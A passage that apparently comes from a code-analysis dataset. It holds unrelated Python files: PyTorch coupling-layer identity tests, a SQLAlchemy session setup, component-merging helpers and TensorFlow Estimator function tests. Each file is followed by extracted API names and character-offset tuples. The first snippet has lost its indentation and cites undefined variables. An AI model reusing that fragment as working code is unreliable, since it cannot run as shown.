raise RuntimeError(f"{Nlayer} Layer ACL (V = {V}) is not initialized to the identity: x_A:\n {x_A} \n y_A:\n {y_A}")
# check that the logDetJ is zero
if not logDetJ == 0:
raise RuntimeError(f"{Nlayer} Layer ACL (V = {V}) has wrong logDetJ: logDetJ={logDetJ} != 0 ")
# Test Failed Successfully...
print("ACL Test successful")
def test_PRACL(V):
def amFactoryI(L, activation):
moduleList = []
for l in range(L-1):
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
# this makes the ACL to be the identity
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
moduleList.append(activation())
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
# no activation after the last layer
# we don't need the log det from these, therefore fall back to
# torchs' Sequential container
return torch.nn.Sequential(*moduleList)
def amFactoryR(L, activation):
moduleList = []
for l in range(L-1):
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
moduleList.append(layer)
moduleList.append(activation())
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
moduleList.append(layer)
# no activation after the last layer
# we don't need the log det from these, therefore fall back to
# torchs' Sequential container
return torch.nn.Sequential(*moduleList)
def PRACL_wrapper(myPRACL, inputTensor):
out,_ = myPRACL(inputTensor)
return out
# Test PRCL as identity
for act in [torch.nn.Tanh, torch.nn.Softsign]:
for LPRACL,LACL in itertools.product([1,2,4,16],repeat=2):
PRACL = createPRCL(V,LPRACL,
lambda *args,**kwargs: createACL(amFactoryI,amFactoryI,**kwargs),
L=LACL,activation=act # are passed as **kwargs to the lambda
)
x = torch.randn(V,dtype=torch.cdouble)
with torch.no_grad():
y,logDetJ = PRACL(x)
if not (x==y).all():
raise RuntimeError(f"{LPRACL}:{LACL} Layer PRACL (V = {V}) is not initialized to the identity: x_A:\n {x_A} \n y_A:\n {y_A}")
# check that the logDetJ is zero
if not logDetJ == 0:
raise RuntimeError(f"{LPRACL}:{LACL} Layer PRACL (V = {V}) has wrong logDetJ: logDetJ={logDetJ} != 0 ")
print("PRACL Identity Test successful")
# Test randomly initialized PRACL
for act in [torch.nn.Tanh, torch.nn.Softsign]:
for LPRACL,LACL in itertools.product([1,2],repeat=2):
PRACL = createPRCL(V,LPRACL,
lambda *args,**kwargs: createACL(amFactoryR,amFactoryR,**kwargs),
L=LACL,activation=act # are passed as **kwargs to the lambda
)
x = torch.randn(V,dtype=torch.cdouble)
xclone = x.clone();
with torch.no_grad():
y,logDetJ = PRACL(x)
# This call is numerical very unstable
# therefore, the following test sometimes fails
# not only on a precision level but also on orders of
# magnitude. We found a similar behaviour with log det
# in NSL. This is realy odd...
# I ran the test multiple times and most of the times it fails
# Even for real numbers (using .logdet) it sometimes fails
#sign,logabsdet = torch.autograd.functional.jacobian(
# lambda inTensor: PRACL_wrapper(PRACL,inTensor),
# x
#).slogdet()
#logDetJ_2 = torch.log(sign) + logabsdet
## check that the logDetJ match
#if not torch.isclose( torch.real(logDetJ),torch.real(logDetJ_2) ):
# raise RuntimeError(f"{LPRACL}:{LACL} Layer ACL (V = {V}) has wrong Re logDetJ: Re logDetJ={logDetJ.real:.20} != {logDetJ_2.real:.20} ")
#if not torch.isclose( torch.imag(logDetJ),torch.imag(logDetJ_2) ):
# raise RuntimeError(f"{LPRACL}:{LACL} Layer ACL (V = {V}) has wrong Im logDetJ: Im logDetJ={logDetJ.imag:.20} != {logDetJ_2.imag:.20} ")
print("PRACL Random Test successful")
    # Exercise both test suites over a range of (even) lattice sizes V.
    for V in [2,4,16,32,128]:
        test_ACL(V)
        test_PRACL(V)
|
[
"itertools.product"
] |
[((3746, 3788), 'itertools.product', 'itertools.product', (['[1, 2, 4, 16]'], {'repeat': '(2)'}), '([1, 2, 4, 16], repeat=2)\n', (3763, 3788), False, 'import itertools\n'), ((4738, 4773), 'itertools.product', 'itertools.product', (['[1, 2]'], {'repeat': '(2)'}), '([1, 2], repeat=2)\n', (4755, 4773), False, 'import itertools\n')]
|
import enum
from datetime import datetime
from functools import reduce

from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker

# Connection settings: an in-memory SQLite database. Flip `debug` to True
# to echo every SQL statement the engine emits.
database_uri = 'sqlite:///:memory:'
debug = False

# Engine, declarative base class, and a ready-to-use ORM session.
db = create_engine(database_uri, echo=debug)
Base = declarative_base()
_session_factory = sessionmaker(bind=db)
session = _session_factory()
|
[
"sqlalchemy.create_engine",
"sqlalchemy.ext.declarative.declarative_base",
"sqlalchemy.orm.sessionmaker"
] |
[((264, 303), 'sqlalchemy.create_engine', 'create_engine', (['database_uri'], {'echo': 'debug'}), '(database_uri, echo=debug)\n', (277, 303), False, 'from sqlalchemy import create_engine\n'), ((311, 329), 'sqlalchemy.ext.declarative.declarative_base', 'declarative_base', ([], {}), '()\n', (327, 329), False, 'from sqlalchemy.ext.declarative import declarative_base\n'), ((340, 361), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'db'}), '(bind=db)\n', (352, 361), False, 'from sqlalchemy.orm import sessionmaker\n')]
|
import functools
import typing
from collections import namedtuple
# A bundle of web assets: two parallel lists, `includes` and `files`.
# Presumably `includes` holds WEB_INCLUDE-style external resources and
# `files` holds local files -- confirm against the callers.
COMPONENT = namedtuple('COMPONENT', ['includes', 'files'])
# A single external web resource: a `name` and its `src` location.
WEB_INCLUDE = namedtuple('WEB_INCLUDE', ['name', 'src'])
def merge_components(
    *components: typing.Union[list, tuple, COMPONENT]
) -> COMPONENT:
    """
    Collapse any number of COMPONENT instances into a single one.

    Arguments may be COMPONENT instances or lists/tuples of them; they are
    flattened first, then their ``includes`` and ``files`` lists are
    concatenated in order.

    :param components:
        COMPONENT instances (or lists/tuples of them) to merge.
    :return:
        One COMPONENT whose lists are the concatenation of all inputs'.
    """
    flat = functools.reduce(flatten_reducer, components, [])
    merged_includes = functools.reduce(
        functools.partial(combine_lists_reducer, 'includes'), flat, [])
    merged_files = functools.reduce(
        functools.partial(combine_lists_reducer, 'files'), flat, [])
    return COMPONENT(includes=merged_includes, files=merged_files)
def flatten_reducer(
        flattened_list: list,
        entry: typing.Union[list, tuple, COMPONENT]
) -> list:
    """
    Reducer that folds COMPONENT entries into one flat list.

    Anything exposing both ``includes`` and ``files`` attributes is treated
    as a COMPONENT and appended as-is; non-empty sequences are spliced in
    element by element; empty or falsy entries are ignored.

    :param flattened_list:
        Accumulator list built up by previous calls of this reducer.
    :param entry:
        A COMPONENT instance or a list/tuple of COMPONENT instances.
    :return:
        The same accumulator with ``entry`` folded in flatly.
    """
    looks_like_component = hasattr(entry, 'includes') and hasattr(entry, 'files')
    if looks_like_component:
        flattened_list.append(entry)
        return flattened_list
    if entry:
        flattened_list.extend(entry)
    return flattened_list
def combine_lists_reducer(
        key: str,
        merged_list: list,
        component: COMPONENT
) -> list:
    """
    Reducer that concatenates one attribute list from each COMPONENT.

    :param key:
        Attribute name on the COMPONENT ('includes' or 'files') to read.
    :param merged_list:
        Accumulator populated by previous calls; mutated in place.
    :param component:
        COMPONENT whose values for ``key`` are appended.
    :return:
        The same accumulator, extended with the component's values.
    """
    merged_list += getattr(component, key)
    return merged_list
|
[
"functools.reduce",
"functools.partial",
"collections.namedtuple"
] |
[((79, 125), 'collections.namedtuple', 'namedtuple', (['"""COMPONENT"""', "['includes', 'files']"], {}), "('COMPONENT', ['includes', 'files'])\n", (89, 125), False, 'from collections import namedtuple\n'), ((140, 182), 'collections.namedtuple', 'namedtuple', (['"""WEB_INCLUDE"""', "['name', 'src']"], {}), "('WEB_INCLUDE', ['name', 'src'])\n", (150, 182), False, 'from collections import namedtuple\n'), ((579, 628), 'functools.reduce', 'functools.reduce', (['flatten_reducer', 'components', '[]'], {}), '(flatten_reducer, components, [])\n', (595, 628), False, 'import functools\n'), ((698, 750), 'functools.partial', 'functools.partial', (['combine_lists_reducer', '"""includes"""'], {}), "(combine_lists_reducer, 'includes')\n", (715, 750), False, 'import functools\n'), ((851, 900), 'functools.partial', 'functools.partial', (['combine_lists_reducer', '"""files"""'], {}), "(combine_lists_reducer, 'files')\n", (868, 900), False, 'import functools\n')]
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Estimator function objects."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import six as six
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import save
from tensorflow.python.training import training
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_lib
from tensorflow_estimator.python.estimator.export import function
from tensorflow_estimator.python.estimator.mode_keys import ModeKeys
def _string_fix(obj):
  """Returns *obj* with every string leaf converted to bytes.

  Used by the tests to compare nested structures of evaluated tensor
  outputs without tripping over str-vs-bytes differences.
  """
  def _to_bytes(value):
    if isinstance(value, six.string_types):
      return compat.as_bytes(value)
    return value
  return nest.map_structure(_to_bytes, obj)
def _model_fn(features, labels, mode):
  """Minimal model_fn that exercises all three Estimator modes.

  TRAIN: predictions = features * labels, train_op bumps the global step.
  EVAL: predictions = features + labels.
  PREDICT: predictions = features + 1.
  The variable `v` (initialized to 23) is folded into the loss so the
  resulting spec owns some state.
  """
  v = variables.Variable(constant_op.constant(23), name='v')
  if mode == ModeKeys.TRAIN:
    return model_fn_lib.EstimatorSpec(
        ModeKeys.TRAIN,
        predictions=features * labels,
        loss=constant_op.constant(5) + v,
        train_op=state_ops.assign_add(training.get_global_step(), 1))
  if mode == ModeKeys.EVAL:
    return model_fn_lib.EstimatorSpec(
        ModeKeys.EVAL,
        loss=constant_op.constant(5) + v,
        predictions=features + labels)
  if mode == ModeKeys.PREDICT:
    return model_fn_lib.EstimatorSpec(
        ModeKeys.PREDICT,
        predictions=features + 1)
def _model_fn_train_only(features, labels):
  """Model_fn variant that only supports TRAIN (takes no mode argument)."""
  v = variables.Variable(constant_op.constant(23), name='v')
  # Loss folds in the variable; train_op advances the global step by one.
  loss = constant_op.constant(5) + v
  increment_step = state_ops.assign_add(training.get_global_step(), 1)
  return model_fn_lib.EstimatorSpec(
      ModeKeys.TRAIN,
      predictions=features * labels,
      loss=loss,
      train_op=increment_step)
def _model_fn_predict_only(features):
  """Model_fn variant that only supports PREDICT (no labels or mode)."""
  predictions = features + 1
  return model_fn_lib.EstimatorSpec(ModeKeys.PREDICT, predictions=predictions)
# TODO(kathywu): Re-enable test after def_function changes are built into
# nightlies.
@test_util.run_all_in_graph_and_eager_modes
class ModelFunctionTest(object):
  """Tests for function.ModelFunction.

  NOTE(review): inherits from `object` rather than `test.TestCase`, so the
  test runner does not collect these methods -- presumably the mechanism
  behind the "re-enable" TODO above; confirm before changing the base.
  """
  def test_from_function(self):
    """A ModelFunction built from a full model_fn serves all three modes."""
    mfn = function.ModelFunction.from_function(_model_fn)
    # TRAIN: _model_fn predicts features * labels -> 3 * 5 == 15.
    out = mfn.train(constant_op.constant(3), constant_op.constant(5))
    self.evaluate(variables.variables_initializer(mfn.variables.values()))
    self.assertEqual(15, self.evaluate(out['predictions']))
    # EVAL: predictions are features + labels -> 7 + 9 == 16.
    out = mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
    self.assertEqual(16, self.evaluate(out['predictions']))
    # PREDICT: predictions are features + 1 -> 10 + 1 == 11.
    out = mfn.predict(constant_op.constant(10))
    self.assertEqual(11, self.evaluate(out['predictions']))
  def test_model_fn_train_only(self):
    """Only the registered TRAIN mode works; EVAL raises ValueError."""
    mfn = function.ModelFunction()
    mfn.add_mode(_model_fn_train_only, ModeKeys.TRAIN)
    # TRAIN: predictions are features * labels -> 4 * 6 == 24.
    out = mfn.train(constant_op.constant(4), constant_op.constant(6))
    self.evaluate(variables.variables_initializer(mfn.variables.values()))
    self.assertEqual(24, self.evaluate(out['predictions']))
    # EVAL was never registered for this ModelFunction.
    with self.assertRaisesRegexp(ValueError, 'not defined'):
      out = mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
  def test_model_fn_predict_only(self):
    """Only the registered PREDICT mode works; EVAL raises ValueError."""
    mfn = function.ModelFunction()
    mfn.add_mode(_model_fn_predict_only, ModeKeys.PREDICT)
    # PREDICT: predictions are features + 1 -> 4 + 1 == 5.
    out = mfn.predict(constant_op.constant(4))
    self.evaluate(variables.variables_initializer(mfn.variables.values()))
    self.assertEqual(5, self.evaluate(out['predictions']))
    # EVAL was never registered for this ModelFunction.
    with self.assertRaisesRegexp(ValueError, 'not defined'):
      out = mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
  def test_save_and_load(self):
    """SavedModel round trip keeps variables (incl. global step) and fns."""
    mfn = function.ModelFunction.from_function(_model_fn)
    out = mfn.train(constant_op.constant(3), constant_op.constant(5))
    self.evaluate(variables.variables_initializer(mfn.variables.values()))
    self.evaluate(out['predictions'])
    # Two more train steps: the global step should reach 3 in total.
    for _ in range(2):
      out = mfn.train(constant_op.constant(3), constant_op.constant(5))
      self.evaluate(out['predictions'])
    self.assertEqual(
        3, self.evaluate(mfn._variable_holder.variables['global_step']))
    mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
    mfn.predict(constant_op.constant(10))
    save_dir = os.path.join(self.get_temp_dir(), 'model_function')
    save.save(mfn, save_dir)
    obj = load.load(save_dir)
    variables_by_name = obj._variables_by_name
    self.evaluate(variables.variables_initializer(
        variables_by_name._unconditional_dependency_names.values()))
    # The saved global-step value (3) must survive the round trip.
    self.assertEqual(3, self.evaluate(variables_by_name.global_step))
    # Restored 'train' still computes features * labels and bumps the step.
    out = obj._functions['train'](constant_op.constant(3),
                                  constant_op.constant(5))
    self.assertEqual(15, self.evaluate(out['predictions']))
    self.assertEqual(4, self.evaluate(variables_by_name.global_step))
    # Restored 'eval' computes features + labels.
    out = obj._functions['eval'](constant_op.constant(7),
                                 constant_op.constant(9))
    self.assertEqual(16, self.evaluate(out['predictions']))
    # Restored 'infer' computes features + 1.
    out = obj._functions['infer'](constant_op.constant(10))
    self.assertEqual(11, self.evaluate(out['predictions']))
def _model_fn_callable_variable_initializers(features, labels, mode):
  """Model_fn with callable variable initializers (for WrappedGraph tests).

  Behaves like _model_fn, except `v` is created from a callable
  initializer instead of an eager constant.
  """
  _ = features, labels
  def _init_v():
    return constant_op.constant(23)
  v = variables.Variable(_init_v, name='v')
  if mode == ModeKeys.TRAIN:
    return model_fn_lib.EstimatorSpec(
        ModeKeys.TRAIN,
        predictions=features * labels,
        loss=constant_op.constant(5) + v,
        train_op=state_ops.assign_add(training.get_global_step(), 1))
  if mode == ModeKeys.EVAL:
    return model_fn_lib.EstimatorSpec(
        ModeKeys.EVAL,
        loss=constant_op.constant(5) + v,
        predictions=features + labels)
  if mode == ModeKeys.PREDICT:
    return model_fn_lib.EstimatorSpec(
        ModeKeys.PREDICT,
        predictions=features + 1)
@test_util.run_all_in_graph_and_eager_modes
class EstimatorWrappedGraphTest(test.TestCase):
  """Tests for function._EstimatorWrappedGraph."""
  def test_wrap_model_fn_train(self):
    """Wrapping in TRAIN mode runs the train_op and bumps the global step."""
    graph = function._EstimatorWrappedGraph()
    features = constant_op.constant(3)
    labels = constant_op.constant(4)
    mode = ModeKeys.TRAIN
    fn = graph.wrap_model_fn(
        _model_fn_callable_variable_initializers,
        mode=mode, args=[features, labels, mode], kwargs={})
    self.evaluate(variables.variables_initializer(graph.variables.values()))
    self.assertEqual(0, self.evaluate(graph.global_step))
    # TRAIN predictions are features * labels -> 3 * 4 == 12; running the
    # wrapped fn advances the global step from 0 to 1.
    self.assertEqual(12, self.evaluate(fn(features, labels)['predictions']))
    self.assertEqual(1, self.evaluate(graph.global_step))
    # The captured EstimatorSpec's train_op is the assign_add on the step.
    self.assertEqual('AssignAddVariableOp',
                     graph.estimator_spec.train_op.type)
  def test_wrap_model_fn_eval(self):
    """Wrapping in EVAL mode yields features + labels predictions."""
    graph = function._EstimatorWrappedGraph()
    features = constant_op.constant(5)
    labels = constant_op.constant(6)
    mode = ModeKeys.EVAL
    fn = graph.wrap_model_fn(
        _model_fn_callable_variable_initializers,
        mode=mode, args=[features, labels, mode], kwargs={})
    # EVAL predictions are features + labels -> 5 + 6 == 11.
    self.assertDictEqual({'predictions': 11},
                         self.evaluate(fn(features, labels)))
  def test_wrap_model_fn_predict(self):
    """Wrapping in PREDICT mode yields features + 1 predictions."""
    graph = function._EstimatorWrappedGraph()
    features = constant_op.constant(7)
    mode = ModeKeys.PREDICT
    fn = graph.wrap_model_fn(
        _model_fn_callable_variable_initializers,
        mode=mode, args=[features, None, mode], kwargs={})
    # PREDICT predictions are features + 1 -> 7 + 1 == 8.
    self.assertDictEqual({'predictions': 8},
                         self.evaluate(fn(features)))
  def test_wrap_input_receiver_fn(self):
    """Wrapped serving input fn exposes default and alternate receivers."""
    def serving_input_fn():
      # Two string placeholders feed the default receiver; `concat` joins
      # them, and `concat2` is a pass-through copy used as an alternate.
      receiver_1 = array_ops.placeholder(dtypes.string)
      receiver_2 = array_ops.placeholder(dtypes.string)
      receiver_tensors = {
          'rec1': receiver_1,
          u'rec2': receiver_2,
      }
      concat = string_ops.string_join([receiver_1, receiver_2])
      concat2 = array_ops.identity(concat)
      features = {
          'feature0': string_ops.string_join([concat, concat2], ':'),
          u'feature1': constant_op.constant([1])
      }
      alternate_tensors = {
          'alt_name_1': concat,
          'alt_name_2': {
              'tensor1': concat,
              'tensor2': concat2}
      }
      return export_lib.ServingInputReceiver(
          features, receiver_tensors, alternate_tensors)
    graph = function._EstimatorWrappedGraph()
    fns = graph.wrap_input_receiver_fn(serving_input_fn)
    # One wrapped fn per receiver: name None appears to be the default
    # receiver; the other names match the alternate_tensors keys above.
    for fn, name in fns:
      if name is None:
        # Default: both receivers feed concat -> '12', feature0 -> '12:12'.
        out = fn(constant_op.constant('1'), constant_op.constant('2'))
        self.assertDictEqual(
            _string_fix({'feature0': '12:12', 'feature1': [1]}),
            _string_fix(self.evaluate(out)))
      elif name == 'alt_name_1':
        # Single-tensor alternate: the input feeds `concat` directly.
        out = fn(constant_op.constant('3'))
        self.assertDictEqual(
            _string_fix({'feature0': '3:3', 'feature1': [1]}),
            _string_fix(self.evaluate(out)))
      elif name == 'alt_name_2':
        # Dict alternate: inputs feed `tensor1` and `tensor2` separately.
        out = fn(constant_op.constant('4'), constant_op.constant('5'))
        self.assertDictEqual(
            _string_fix({'feature0': '4:5', 'feature1': [1]}),
            _string_fix(self.evaluate(out)))
# Run the TensorFlow test harness when executed as a script.
if __name__ == '__main__':
  test.main()
|
[
"tensorflow.python.platform.test.main",
"tensorflow.python.util.compat.as_bytes",
"tensorflow_estimator.python.estimator.export.export_lib.ServingInputReceiver",
"tensorflow.python.saved_model.save.save",
"tensorflow_estimator.python.estimator.export.function._EstimatorWrappedGraph",
"tensorflow.python.ops.array_ops.identity",
"tensorflow_estimator.python.estimator.model_fn.EstimatorSpec",
"tensorflow.python.framework.constant_op.constant",
"tensorflow_estimator.python.estimator.export.function.ModelFunction.from_function",
"tensorflow.python.ops.array_ops.placeholder",
"tensorflow.python.saved_model.load.load",
"tensorflow.python.training.training.get_global_step",
"tensorflow_estimator.python.estimator.export.function.ModelFunction",
"tensorflow.python.ops.string_ops.string_join"
] |
[((2898, 2968), 'tensorflow_estimator.python.estimator.model_fn.EstimatorSpec', 'model_fn_lib.EstimatorSpec', (['ModeKeys.PREDICT'], {'predictions': '(features + 1)'}), '(ModeKeys.PREDICT, predictions=features + 1)\n', (2924, 2968), True, 'from tensorflow_estimator.python.estimator import model_fn as model_fn_lib\n'), ((10206, 10217), 'tensorflow.python.platform.test.main', 'test.main', ([], {}), '()\n', (10215, 10217), False, 'from tensorflow.python.platform import test\n'), ((1954, 1978), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(23)'], {}), '(23)\n', (1974, 1978), False, 'from tensorflow.python.framework import constant_op\n'), ((2032, 2102), 'tensorflow_estimator.python.estimator.model_fn.EstimatorSpec', 'model_fn_lib.EstimatorSpec', (['ModeKeys.PREDICT'], {'predictions': '(features + 1)'}), '(ModeKeys.PREDICT, predictions=features + 1)\n', (2058, 2102), True, 'from tensorflow_estimator.python.estimator import model_fn as model_fn_lib\n'), ((2609, 2633), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(23)'], {}), '(23)\n', (2629, 2633), False, 'from tensorflow.python.framework import constant_op\n'), ((3191, 3238), 'tensorflow_estimator.python.estimator.export.function.ModelFunction.from_function', 'function.ModelFunction.from_function', (['_model_fn'], {}), '(_model_fn)\n', (3227, 3238), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((3736, 3760), 'tensorflow_estimator.python.estimator.export.function.ModelFunction', 'function.ModelFunction', ([], {}), '()\n', (3758, 3760), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((4211, 4235), 'tensorflow_estimator.python.estimator.export.function.ModelFunction', 'function.ModelFunction', ([], {}), '()\n', (4233, 4235), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((4658, 4705), 
'tensorflow_estimator.python.estimator.export.function.ModelFunction.from_function', 'function.ModelFunction.from_function', (['_model_fn'], {}), '(_model_fn)\n', (4694, 4705), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((5303, 5327), 'tensorflow.python.saved_model.save.save', 'save.save', (['mfn', 'save_dir'], {}), '(mfn, save_dir)\n', (5312, 5327), False, 'from tensorflow.python.saved_model import save\n'), ((5339, 5358), 'tensorflow.python.saved_model.load.load', 'load.load', (['save_dir'], {}), '(save_dir)\n', (5348, 5358), False, 'from tensorflow.python.saved_model import load\n'), ((6429, 6499), 'tensorflow_estimator.python.estimator.model_fn.EstimatorSpec', 'model_fn_lib.EstimatorSpec', (['ModeKeys.PREDICT'], {'predictions': '(features + 1)'}), '(ModeKeys.PREDICT, predictions=features + 1)\n', (6455, 6499), True, 'from tensorflow_estimator.python.estimator import model_fn as model_fn_lib\n'), ((7080, 7113), 'tensorflow_estimator.python.estimator.export.function._EstimatorWrappedGraph', 'function._EstimatorWrappedGraph', ([], {}), '()\n', (7111, 7113), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((7129, 7152), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(3)'], {}), '(3)\n', (7149, 7152), False, 'from tensorflow.python.framework import constant_op\n'), ((7166, 7189), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(4)'], {}), '(4)\n', (7186, 7189), False, 'from tensorflow.python.framework import constant_op\n'), ((7779, 7812), 'tensorflow_estimator.python.estimator.export.function._EstimatorWrappedGraph', 'function._EstimatorWrappedGraph', ([], {}), '()\n', (7810, 7812), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((7828, 7851), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (7848, 7851), False, 'from tensorflow.python.framework import 
constant_op\n'), ((7865, 7888), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(6)'], {}), '(6)\n', (7885, 7888), False, 'from tensorflow.python.framework import constant_op\n'), ((8216, 8249), 'tensorflow_estimator.python.estimator.export.function._EstimatorWrappedGraph', 'function._EstimatorWrappedGraph', ([], {}), '()\n', (8247, 8249), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((8265, 8288), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (8285, 8288), False, 'from tensorflow.python.framework import constant_op\n'), ((9367, 9400), 'tensorflow_estimator.python.estimator.export.function._EstimatorWrappedGraph', 'function._EstimatorWrappedGraph', ([], {}), '()\n', (9398, 9400), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((3259, 3282), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(3)'], {}), '(3)\n', (3279, 3282), False, 'from tensorflow.python.framework import constant_op\n'), ((3284, 3307), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (3304, 3307), False, 'from tensorflow.python.framework import constant_op\n'), ((3469, 3492), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (3489, 3492), False, 'from tensorflow.python.framework import constant_op\n'), ((3494, 3517), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(9)'], {}), '(9)\n', (3514, 3517), False, 'from tensorflow.python.framework import constant_op\n'), ((3601, 3625), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(10)'], {}), '(10)\n', (3621, 3625), False, 'from tensorflow.python.framework import constant_op\n'), ((3836, 3859), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(4)'], {}), '(4)\n', (3856, 3859), False, 
'from tensorflow.python.framework import constant_op\n'), ((3861, 3884), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(6)'], {}), '(6)\n', (3881, 3884), False, 'from tensorflow.python.framework import constant_op\n'), ((4317, 4340), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(4)'], {}), '(4)\n', (4337, 4340), False, 'from tensorflow.python.framework import constant_op\n'), ((4727, 4750), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(3)'], {}), '(3)\n', (4747, 4750), False, 'from tensorflow.python.framework import constant_op\n'), ((4752, 4775), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (4772, 4775), False, 'from tensorflow.python.framework import constant_op\n'), ((5139, 5162), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (5159, 5162), False, 'from tensorflow.python.framework import constant_op\n'), ((5164, 5187), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(9)'], {}), '(9)\n', (5184, 5187), False, 'from tensorflow.python.framework import constant_op\n'), ((5205, 5229), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(10)'], {}), '(10)\n', (5225, 5229), False, 'from tensorflow.python.framework import constant_op\n'), ((5632, 5655), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(3)'], {}), '(3)\n', (5652, 5655), False, 'from tensorflow.python.framework import constant_op\n'), ((5691, 5714), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (5711, 5714), False, 'from tensorflow.python.framework import constant_op\n'), ((5880, 5903), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (5900, 5903), False, 'from tensorflow.python.framework import constant_op\n'), 
((5938, 5961), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(9)'], {}), '(9)\n', (5958, 5961), False, 'from tensorflow.python.framework import constant_op\n'), ((6058, 6082), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(10)'], {}), '(10)\n', (6078, 6082), False, 'from tensorflow.python.framework import constant_op\n'), ((6351, 6375), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(23)'], {}), '(23)\n', (6371, 6375), False, 'from tensorflow.python.framework import constant_op\n'), ((8645, 8681), 'tensorflow.python.ops.array_ops.placeholder', 'array_ops.placeholder', (['dtypes.string'], {}), '(dtypes.string)\n', (8666, 8681), False, 'from tensorflow.python.ops import array_ops\n'), ((8701, 8737), 'tensorflow.python.ops.array_ops.placeholder', 'array_ops.placeholder', (['dtypes.string'], {}), '(dtypes.string)\n', (8722, 8737), False, 'from tensorflow.python.ops import array_ops\n'), ((8851, 8899), 'tensorflow.python.ops.string_ops.string_join', 'string_ops.string_join', (['[receiver_1, receiver_2]'], {}), '([receiver_1, receiver_2])\n', (8873, 8899), False, 'from tensorflow.python.ops import string_ops\n'), ((8916, 8942), 'tensorflow.python.ops.array_ops.identity', 'array_ops.identity', (['concat'], {}), '(concat)\n', (8934, 8942), False, 'from tensorflow.python.ops import array_ops\n'), ((9264, 9342), 'tensorflow_estimator.python.estimator.export.export_lib.ServingInputReceiver', 'export_lib.ServingInputReceiver', (['features', 'receiver_tensors', 'alternate_tensors'], {}), '(features, receiver_tensors, alternate_tensors)\n', (9295, 9342), False, 'from tensorflow_estimator.python.estimator.export import export_lib\n'), ((1815, 1833), 'tensorflow.python.util.compat.as_bytes', 'compat.as_bytes', (['x'], {}), '(x)\n', (1830, 1833), False, 'from tensorflow.python.util import compat\n'), ((2752, 2775), 'tensorflow.python.framework.constant_op.constant', 
